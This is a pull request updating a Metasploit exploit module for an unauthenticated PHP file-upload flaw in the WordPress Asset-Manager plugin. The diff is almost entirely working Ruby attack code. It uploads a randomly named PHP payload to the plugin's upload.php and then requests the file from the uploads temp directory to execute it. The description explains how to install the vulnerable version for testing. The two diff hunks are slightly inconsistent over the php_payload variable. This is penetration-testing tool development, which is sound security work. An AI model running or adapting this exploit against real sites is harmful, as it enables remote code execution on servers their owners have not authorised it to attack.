### PR TITLE
Updated wp_asset_manager_upload_exec module

### DIFF
--- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_name = "#{rand_text_alpha(5)}.php"
 
     data = Rex::MIME::Message.new
-    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload #{payload_name}")

--- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
@@ -8,81 +8,76 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::PhpEXE
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
-      'Description'    => %q{
-        This module exploits a vulnerability found in Asset-Manager <= 2.0	WordPress
-        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
+      'Description'    => %q(
+        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
+        plugin. By abusing the upload.php file, a malicious user can upload a file to a
         temp directory without authentication, which results in arbitrary code execution.
-      },
+      ),
       'Author'         =>
         [
-          'Sammy FORGIT', # initial discovery
-          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+          'Sammy FORGIT',                           # initial discovery
+          'James Fitts <fitts.james[at]gmail.com>'  # metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'OSVDB', '82653' ],
-          [ 'BID', '53809' ],
-          [ 'EDB', '18993' ],
-          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ]
+          %w(OSVDB 82653),
+          %w(BID 53809),
+          %w(EDB 18993),
+          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html']
         ],
-      'Payload'	     =>
-        {
-          'BadChars' => "\x00",
-        },
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        =>
-        [
-          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
-          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
-        ],
+      'Targets'        => [['asset-manager <= 2.0', {}]],
       'DefaultTarget' => 0,
       'DisclosureDate' => 'May 26 2012'))
+  end
 
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
-      ], self.class)
+  def check
+    uri = normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+
+    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200
+
+    Exploit::CheckCode::Detected
   end
 
   def exploit
-    uri =  target_uri.path
-    uri << '/' if uri[-1,1] != '/'
-    peer = "#{rhost}:#{rport}"
     payload_name = "#{rand_text_alpha(5)}.php"
-    php_payload = get_write_exec_payload(:unlink_self=>true)
 
     data = Rex::MIME::Message.new
-    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
+    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload #{payload_name}")
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method'  => 'POST',
-      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
+      'uri'     => normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php'),
       'ctype'   => "multipart/form-data; boundary=#{data.bound}",
       'data'    => post_data
-    })
+    )
 
-    if not res or res.code != 200 or res.body !~ /#{payload_name}/
+    if res.nil? || res.code != 200 || res.body !~ /#{payload_name}/
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
-    print_status("#{peer} - Executing payload #{payload_name}")
-    res = send_request_raw({
-      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
-      'method'  => 'GET'
-    })
+    register_files_for_cleanup(payload_name)
 
-    if res and res.code != 200
-      fail_with(Failure::UnexpectedReply, "#{peer} - Execution failed")
-    end
+    print_status("#{peer} - Executing payload #{payload_name}")
+    send_request_raw(
+      'uri'     => normalize_uri(wordpress_url_wp_content, 'uploads', 'assets', 'temp', payload_name),
+      'method'  => 'GET'
+    )
   end
 end


### PR DESCRIPTION
This PR updates the wp_asset_manager_upload_exec module

You can get the vulnerable version only via SVN.
Execute the following commands in your `wp-content/plugins/` folder:

```
svn co http://plugins.svn.wordpress.org/asset-manager/tags/0.2/ asset-manager
chown -R www-data:www-data asset-manager/
```

After this, activate the plugin in the backend (Plugin activation did not work correctly on my side, but enough to make the exploit work)

Output:
![11](https://cloud.githubusercontent.com/assets/105281/3740237/1e3c2904-1753-11e4-9c58-6a9e36a3d4f2.png)
